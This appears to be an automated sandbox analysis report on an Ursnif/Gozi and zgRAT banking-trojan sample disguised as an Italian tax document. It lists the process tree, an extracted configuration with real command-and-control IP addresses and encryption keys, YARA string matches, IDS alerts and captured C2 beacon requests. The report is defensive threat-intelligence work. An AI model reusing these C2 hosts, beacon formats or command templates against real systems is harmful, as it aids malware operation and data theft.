
Windows Analysis Report
Informazion.exe

Overview

General Information

Sample Name: Informazion.exe
Analysis ID: 782969
MD5: ef4c4f0b7a8cd7b8bd2d2dc6e5982043
SHA1: 2374d2dc1ca7f5ebed5386114562ee677eacdb42
SHA256: 6da6fa5a959ad50302b32db9fad3862abcbd0597402941d66935203300d52821
Tags: agenziaentrate, exe, gozi, isfb, ITA, ursnif

Detection

Ursnif, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Antivirus detection for dropped file
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Found API chain indicative of debugger detection
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • Informazion.exe (PID: 1248 cmdline: C:\Users\user\Desktop\Informazion.exe MD5: EF4C4F0B7A8CD7B8BD2D2DC6E5982043)
    • maintainabovl.exe (PID: 5976 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe MD5: B405B1565194722F9457002C4EDACBAE)
      • powershell.exe (PID: 5272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA4AA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • maintainabovl.exe (PID: 5732 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe MD5: B405B1565194722F9457002C4EDACBAE)
  • rundll32.exe (PID: 4492 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
{"RSA Public Key": "54nMcVbXsJKTKH8vVcgw8Yc+0pa2wr9G1H7/o7rLdJBKWNOwCDnMbXJcYNR/i7ibeIJSs3tRtxGwe2iUFKyX9YoO+lmIhr2QGinDzUBltMzooqhiU0FAsksgVKbdHApXih+yEsJjWrQ0Nzp5JxORKkch7icLGeCLd05bxwIatms+T13zzTeMAFna0q142O86LqNqYV0xf+Tp2Oo0whVb+J6hIfqd8URvw6BnxV5krG1NtSt96qfTtKKe9QJkizTNzWNfNBEuZ9jTKZZOZWrZVkcQAS+uDgm7SSO8VqkRP0eVceSUC6Y9BRbQlysqEFQ38Tzo5xZYetYnZnzD+V1Ml9UfqfxI8vecS8UO11Jnsnc=", "c2_domain": ["checklist.skype.com", "62.173.149.202", "31.41.44.158", "193.0.178.157"], "botnet": "7704", "server": "50", "serpent_key": "oLA95erEW710RFWb", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source | Rule | Description | Author
00000001.00000002.501526804.0000000003FD4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_fd494041 | unknown | unknown
  Strings:
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_261f5ac5 | unknown | unknown
  Strings:
  • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1c80:$a9: Software\AppDataLow\Software\Microsoft\
00000001.00000002.499268077.0000000002E56000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security

Source | Rule | Description | Author
1.2.maintainabovl.exe.2deb5a8.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
1.2.maintainabovl.exe.2d6f3f8.4.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
1.2.maintainabovl.exe.2deb5a8.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
1.2.maintainabovl.exe.3fd4590.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
1.2.maintainabovl.exe.2e0cee0.3.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
No Sigma rule has matched

Snort IDS alerts:
Timestamp: 01/12/23-12:14:18.009455 | Source: 192.168.2.4:49696 | Destination: 62.173.149.202:80 | Protocol: TCP | SID: 2033204 | Classtype: A Network Trojan was detected
Timestamp: 01/12/23-12:14:18.009455 | Source: 192.168.2.4:49696 | Destination: 62.173.149.202:80 | Protocol: TCP | SID: 2033203 | Classtype: A Network Trojan was detected
Timestamp: 01/12/23-12:14:38.185535 | Source: 192.168.2.4:49697 | Destination: 31.41.44.158:80 | Protocol: TCP | SID: 2033203 | Classtype: A Network Trojan was detected
Timestamp: 01/12/23-12:14:38.185535 | Source: 192.168.2.4:49697 | Destination: 31.41.44.158:80 | Protocol: TCP | SID: 2033204 | Classtype: A Network Trojan was detected
Timestamp: 01/12/23-12:14:58.327920 | Source: 192.168.2.4:49698 | Destination: 193.0.178.157:80 | Protocol: TCP | SID: 2033203 | Classtype: A Network Trojan was detected

                  AV Detection

Source: Informazion.exe | Virustotal: Detection: 14%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Avira: detection malicious, Label: TR/Crypt.OPACK.Gen
Source: 1.2.maintainabovl.exe.2deb5a8.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.maintainabovl.exe.2e0cee0.3.unpack | Avira: Label: TR/Patched.Ren.Gen4
Source: 1.2.maintainabovl.exe.2d6f3f8.4.unpack | Avira: Label: TR/Patched.Ren.Gen4
Source: 7.2.maintainabovl.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
Source: 1.2.maintainabovl.exe.2e03a34.0.unpack | Avira: Label: TR/Patched.Ren.Gen4
Source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "54nMcVbXsJKTKH8vVcgw8Yc+0pa2wr9G1H7/o7rLdJBKWNOwCDnMbXJcYNR/i7ibeIJSs3tRtxGwe2iUFKyX9YoO+lmIhr2QGinDzUBltMzooqhiU0FAsksgVKbdHApXih+yEsJjWrQ0Nzp5JxORKkch7icLGeCLd05bxwIatms+T13zzTeMAFna0q142O86LqNqYV0xf+Tp2Oo0whVb+J6hIfqd8URvw6BnxV5krG1NtSt96qfTtKKe9QJkizTNzWNfNBEuZ9jTKZZOZWrZVkcQAS+uDgm7SSO8VqkRP0eVceSUC6Y9BRbQlysqEFQ38Tzo5xZYetYnZnzD+V1Ml9UfqfxI8vecS8UO11Jnsnc=", "c2_domain": ["checklist.skype.com", "62.173.149.202", "31.41.44.158", "193.0.178.157"], "botnet": "7704", "server": "50", "serpent_key": "oLA95erEW710RFWb", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C5130EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF64C5130EC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_010952F6 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,7_2_010952F6
Source: unknown | HTTPS traffic detected: 174.142.60.54:443 -> 192.168.2.4:49695 version: TLS 1.2
Source: Informazion.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wextract.pdb source: Informazion.exe
Source: Binary string: wextract.pdbGCTL source: Informazion.exe
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C51204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF64C51204C

                  Networking

Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49696 -> 62.173.149.202:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49696 -> 62.173.149.202:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49697 -> 31.41.44.158:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49697 -> 31.41.44.158:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49698 -> 193.0.178.157:80
Source: Joe Sandbox View | ASN Name: MGNHOST-ASRU MGNHOST-ASRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /wp-admin/images/css/ground/bo/Zujiies.png HTTP/1.1 | Host: christianbeltran.co | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /drew/jHChKd_2FjBQ0IhBZb/5eUb4wlnJ/nNAqLlhkhlVL_2BEMNaO/fU1yD2cllcbT9iHTfpI/6H3bbK1eyqLaqlIY2TE5OB/0EJzuQaexEZcX/7fNH93_2/BPaD_2BE_2FjENdy4RFw7Ax/5wIB2h5UN_/2FRQ47MCK2MIF7ewb/8_2Fu3XthbQR/CPx2qHatKTD/YHT_2FrDgK83SJ/t3nFbWzQ9PsSm_2Fb3E2u/XDf1ma0rrcvNnpl1/ThfvvL6MGjuAWJC/PiXEIoZrVwPJmdlxug/dGZn9wbLf/wg1whEjmB/85umsLkj4az/T.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 62.173.149.202 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/OUUsBzpIZZUphm/Tsj7lOWVT01GR7_2B_2F3/h1YqNuP4WcrzeCJs/x51Rts0xb3FAs1_/2Bxw1CaQKlICTyuLN1/TaoUc8_2F/5TTXCIOA0SRbwyts6JTK/R5MlMx5IeVFFgmHEPpZ/TWM7GdLrJHM_2B3S8B1eU7/_2BBh5oB1R_2F/_2BxltWj/_2BLEoNYS3p4VDy7elM9qu2/U5PEBiMSrU/T6YOXvs_2FZLXPTA3/hObNStGHJyyy/hCCoXchnbdJ/ixUgp0U2WECwia/6eVsNKM8Cmg7_2F7HmThU/LsrExo0WJYro/O9pQu.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 31.41.44.158 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/lGr5mrbDGs3py0IkX1xCdao/J_2BO3pveg/tEN51c8QgFcgipJDl/9B6bT37vHiCK/xeYTuAvP5ZA/n_2BT1EpLoFWJa/4mubDHfkDoaafTL29qqXs/Pr23musVKIKOk0xu/4mHeVX_2FY0FOLH/NMKX_2BVJj7BkC0dl6/T90V1bDM6/suQsVdE5n84CtWOe45Jz/zXcs4agZHeV5dnP4wZv/fQWwms1zkQgJ1jKz1zGBWe/F8C2u26K4tWR3/LoRQN_2B/eADxrRsvut3YtTrDMejjOLK/i3S1e0Ho1/08GsbQQc.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 193.0.178.157 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.149.202 (reported 5 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 31.41.44.158 (reported 5 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 193.0.178.157 (reported 6 times)
Source: maintainabovl.exe, 00000007.00000002.821094990.000000000166C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://193.0.
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: maintainabovl.exe, 00000001.00000003.359579923.0000000005B46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://en.w.
Source: maintainabovl.exe, 00000001.00000003.359298500.0000000005B62000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359272839.0000000005B63000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://en.wikipedia
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: maintainabovl.exe, 00000001.00000002.499268077.0000000002C51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comF
Source: maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comM.TTF
Source: maintainabovl.exe, 00000001.00000003.497054924.0000000005B40000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.367935918.0000000005B4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.coma6
Source: maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comkh
Source: maintainabovl.exe, 00000001.00000003.497054924.0000000005B40000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.367935918.0000000005B4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comm
Source: maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comrsivL
Source: maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comsivaz
Source: maintainabovl.exe, 00000001.00000003.497054924.0000000005B40000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.367935918.0000000005B4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comueTFg
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360417576.0000000005B47000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360368772.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360316834.0000000005B47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
